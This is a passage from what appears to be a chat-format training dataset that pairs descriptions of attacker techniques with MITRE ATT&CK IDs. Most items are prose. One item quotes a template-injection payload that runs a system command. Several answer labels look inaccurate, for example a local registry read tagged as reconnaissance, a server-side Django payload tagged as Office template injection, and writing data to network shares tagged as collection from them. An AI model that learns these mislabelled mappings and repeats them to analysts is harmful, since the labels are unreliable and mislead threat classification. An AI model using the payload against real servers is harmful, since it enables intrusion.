- "content": "The threat actor uses schtasks.exe to add a task that launches a DLL loader once a user logs on."
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An advanced persistent threat uses the CLI of a load balancer to re-route traffic to a malicious server."
- },
- {
- "role": "assistant",
- "content": "T1059.008 - Command and Scripting Interpreter: Network Device CLI"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker alters the MFA flow to inject a malicious second factor that they control, allowing them to bypass the legitimate authentication step."
- },
- {
- "role": "assistant",
- "content": "T1556.006 - Modify Authentication Process: Multi-Factor Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries create a malicious time provider entry in the registry, causing their code to run each boot."
- },
- {
- "role": "assistant",
- "content": "T1547.003 - Boot or Logon Autostart Execution: Time Providers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor sends a batch file that calls the system's compiler to produce a malicious executable after deployment, evading file hash-based defenses."
- },
- {
- "role": "assistant",
- "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By leveraging legitimate domain credentials, the adversary requests Kerberos tickets for service accounts with weak passwords and then cracks the tickets offline."
- },
- {
- "role": "assistant",
- "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The trojan stores its second-stage payload inside the resource section of a PNG image, extracting it using a custom loader."
- },
- {
- "role": "assistant",
- "content": "T1027.009 - Obfuscated Files or Information: Embedded Payloads"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious PowerShell script uses \"Get-CimInstance -ClassName Win32_SystemDriver\" to list drivers."
- },
- {
- "role": "assistant",
- "content": "T1652 - Device Driver Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misusing legitimate software for data compression and exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attacker patches the Linux initramfs with a trojanized init script to gain persistence."
- },
- {
- "role": "assistant",
- "content": "T1601.001 - Modify System Image: Patch System Image"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious actor abused compromised VMware vSphere credentials to provision new virtual machines within the private cloud environment."
- },
- {
- "role": "assistant",
- "content": "T1578.002 - Modify Cloud Compute Infrastructure: Create Cloud Instance"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious script opens an SSH session to a target machine to download additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attacker uses Passive DNS replication data to identify historic IP addresses linked to the target's domains."
- },
- {
- "role": "assistant",
- "content": "T1596.001 - Search Open Technical Databases: DNS/Passive DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker stopped the auditd service and removed its startup script to avoid logging."
- },
- {
- "role": "assistant",
- "content": "T1562.012 - Impair Defenses: Disable or Modify Linux Audit System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors compromised a user’s account and then retrieved saved credentials from the Android credential storage API."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intruder leveraged cloud console commands to revert an instance to a prior image, negating installed backdoors."
- },
- {
- "role": "assistant",
- "content": "T1578.004 - Modify Cloud Compute Infrastructure: Revert Cloud Instance"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary extracts password hashes from the Windows SAM database using a custom script."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor uses the Windows API NetShareEnum to retrieve a list of shared directories on the compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries delete their own files after execution to reduce forensic footprints."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious installer scans the hardware fingerprint, including motherboard serial and BIOS version, and only proceeds on matching devices."
- },
- {
- "role": "assistant",
- "content": "T1480.001 - Execution Guardrails: Environmental Keying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker sends a REST request to the Kubernetes API server to enumerate all namespaces, pods, and services in the cluster."
- },
- {
- "role": "assistant",
- "content": "T1613 - Container and Resource Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware extracts the list of installed applications by reading the Windows registry keys HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall."
- },
- {
- "role": "assistant",
- "content": "T1592.002 - Gather Victim Host Information: Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious add‑on is injected into the BIOS update package of a laptop brand, enabling the adversary to bypass secure boot and install rootkits."
- },
- {
- "role": "assistant",
- "content": "T1195.003 - Supply Chain Compromise: Compromise Hardware Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious actor hijacks the permissions of a critical system service, then replaces its executable with ransomware to encrypt files when the service restarts."
- },
- {
- "role": "assistant",
- "content": "T1569 - System Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries scrape social media platforms and professional networking sites to collect email addresses, job titles, and personal interests of target employees."
- },
- {
- "role": "assistant",
- "content": "T1589 - Gather Victim Identity Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An adversary compromises a popular news site, inserting malicious code that exploits browser plugins to install ransomware on visitors."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During system provisioning, a threat actor injects a backdoored disk image that loads malicious payloads when the machine starts."
- },
- {
- "role": "assistant",
- "content": "T1525 - Implant Internal Image"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using stolen SSH keys, the attacker accessed the server and replaced the site's favicon and header with defacement imagery."
- },
- {
- "role": "assistant",
- "content": "T1491.002 - Defacement: External Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using a legitimate IDE's command-line interface, the attacker triggers execution of a malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1127 - Trusted Developer Utilities Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor extracts a Salesforce connected app token and uses it to query sensitive CRM data via API calls."
- },
- {
- "role": "assistant",
- "content": "T1550.001 - Use Alternate Authentication Material: Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The operation uses a multi-hop proxy architecture, chaining compromised nodes to relay malicious traffic to its final destination."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious actor abuses the MSBuild binary to compile and run a backdoor DLL through a compromised CI/CD pipeline."
- },
- {
- "role": "assistant",
- "content": "T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A backdoor uses SetThreadContext to inject code into a high-privilege process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious code is concealed inside legitimate files, such as PDFs or images, allowing it to run when opened."
- },
- {
- "role": "assistant",
- "content": "T1027.009 - Obfuscated Files or Information: Embedded Payloads"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A remote access tool executes the 'screencap' command on Linux systems to dump the current X session to a file for later retrieval."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actor uses PowerSploit's Invoke-Mimikatz to pull credentials from the Credential Manager."
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious actor takes advantage of a software bug in a system service to disable logging mechanisms for stealth."
- },
- {
- "role": "assistant",
- "content": "T1211 - Exploitation for Defense Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group leveraged a botnet of compromised cloud containers to execute lateral movement within the target environment."
- },
- {
- "role": "assistant",
- "content": "T1584.005 - Compromise Infrastructure: Botnet"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker employed a Python script that parses the output of \"netstat -r\" to discover routing and connection information."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor leverages an unpatched SQL injection flaw to cause the database server to become unresponsive on the host."
- },
- {
- "role": "assistant",
- "content": "T1499.004 - Endpoint Denial of Service: Application or System Exploitation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XSL script processing is abused when a malicious XSLT is used to bypass security controls and run arbitrary code on the target."
- },
- {
- "role": "assistant",
- "content": "T1220 - XSL Script Processing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attacker sets the 'EnableCommandLogging' group policy to '0' to turn off command history logging on all domain computers."
- },
- {
- "role": "assistant",
- "content": "T1562.003 - Impair Defenses: Impair Command History Logging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary leveraged PowerShell to enumerate all removable media and copy user profile data to a hidden folder on each device."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker sets the COR_PROFILER environment variable to a malicious DLL, causing .NET applications to load the payload when they start."
- },
- {
- "role": "assistant",
- "content": "T1574.012 - Hijack Execution Flow: COR_PROFILER"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker utilizes the Windows Management Instrumentation command to pull BIOS release date and vendor details."
- },
- {
- "role": "assistant",
- "content": "T1592.003 - Gather Victim Host Information: Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware exfiltrates data by sending symmetrically encrypted packets over a proprietary protocol on a non‑standard port, keeping it separate from its C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1048.001 - Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker crafts a payload containing \"{% import os %}{% os.system('id') %}\" which is executed when the server renders the user-supplied content in a Django template."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion set checks password expiration and lockout thresholds via the security policy editor."
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors compromise the IIS server and replace the default ISAPI filter with a custom DLL that provides a backdoor for remote command execution."
- },
- {
- "role": "assistant",
- "content": "T1505.004 - Server Software Component: IIS Components"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By abusing the authentication package registration process, the attacker achieves code execution each time a credential is validated."
- },
- {
- "role": "assistant",
- "content": "T1547.002 - Boot or Logon Autostart Execution: Authentication Package"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers embed Visual Basic code in a Microsoft Office document to download and execute a payload on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker exploits the Windows API to perform a ListPlanting injection, modifying the linked list of process structures to execute a payload."
- },
- {
- "role": "assistant",
- "content": "T1055.015 - Process Injection: ListPlanting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary initially creates a covert DNS tunnel to communicate with their malware, then later uses a secondary HTTP channel to transfer stolen files."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor modifies an existing legitimate service to execute a payload after system restart."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operators used the built-in Windows command interpreter to execute \"whoami\" and enumerate the current user context."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary creates a new scheduled task with a hidden trigger that executes a reverse shell daily."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The spyware drops a payload into the /data/tmp directory, then uses reflective loading to execute it in the context of a privileged service."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attacker uses a compromised cloud account to deploy a container with a backdoor onto the victim’s orchestration platform."
- },
- {
- "role": "assistant",
- "content": "T1610 - Deploy Container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker reads database usernames and passwords embedded in a legacy Java properties file and uploads the file to a command‑and‑control server."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious group acquires detailed network diagrams and IP address ranges of the target organization by buying them from insider sources."
- },
- {
- "role": "assistant",
- "content": "T1597.002 - Search Closed Sources: Purchase Technical Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary places a Trojan in a publicly accessible file share, allowing it to be downloaded and executed on other compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion tool searches for network drives with write permissions and writes stolen data into them."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT group clears Linux audit logs by truncating /var/log/audit/audit.log after exfiltrating data."
- },
- {
- "role": "assistant",
- "content": "T1070.002 - Indicator Removal: Clear Linux or Mac System Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the intrusion, the actor disables the Security log channel via the Windows API to hide activity."
- },
- {
- "role": "assistant",
- "content": "T1562.002 - Impair Defenses: Disable Windows Event Logging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware extracts Kerberos tickets from LSASS and then crafts custom tickets to bypass authentication."
- },
- {
- "role": "assistant",
- "content": "T1558 - Steal or Forge Kerberos Tickets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A phishing payload runs a PowerShell command that adds a forwarding rule to Outlook, sending all new emails to the attacker’s domain."
- },
- {
- "role": "assistant",
- "content": "T1114.003 - Email Collection: Email Forwarding Rule"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A ransomware group initiates a memory exhaustion attack on endpoint agents, causing them to crash and stop reporting."
- },
- {
- "role": "assistant",
- "content": "T1499 - Endpoint Denial of Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors use automated scripts to search Bitbucket for exposed .env files containing passwords."
- },
- {
- "role": "assistant",
- "content": "T1593.003 - Search Open Websites/Domains: Code Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion involved the use of Google Cloud’s remote SSH service to interact with compromised servers."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious insider changes group membership in the on-prem AD and forces replication to Office 365, resulting in elevated privileges."
- },
- {
- "role": "assistant",
- "content": "T1556.007 - Modify Authentication Process: Hybrid Identity"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Red team simulates data theft by using a service account to pull all Confluence markdown files via the XML export."
- },
- {
- "role": "assistant",
- "content": "T1213.001 - Data from Information Repositories: Confluence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion uses the “Living off the Land” technique by executing native Windows binaries like certutil.exe to download payloads."
- },
- {
- "role": "assistant",
- "content": "T1218 - System Binary Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers corrupt the backup files on the file server, causing loss of data integrity for restored systems."
- },
- {
- "role": "assistant",
- "content": "T1565.001 - Data Manipulation: Stored Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion leverages the at utility to queue a command that downloads additional malware from a remote server."
- },
- {
- "role": "assistant",
- "content": "T1053.002 - Scheduled Task/Job: At"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During lateral movement, the adversary performed file enumeration on remote shares via SMB to identify accessible resources."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A compromised bot accesses SharePoint via the web UI, uses the ‘Download a Copy’ feature to retrieve sensitive reports."
- },
- {
- "role": "assistant",
- "content": "T1213.002 - Data from Information Repositories: Sharepoint"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker overwhelms the target’s network by sending a massive volume of UDP packets directly to random ports, causing a denial of service."
- },
- {
- "role": "assistant",
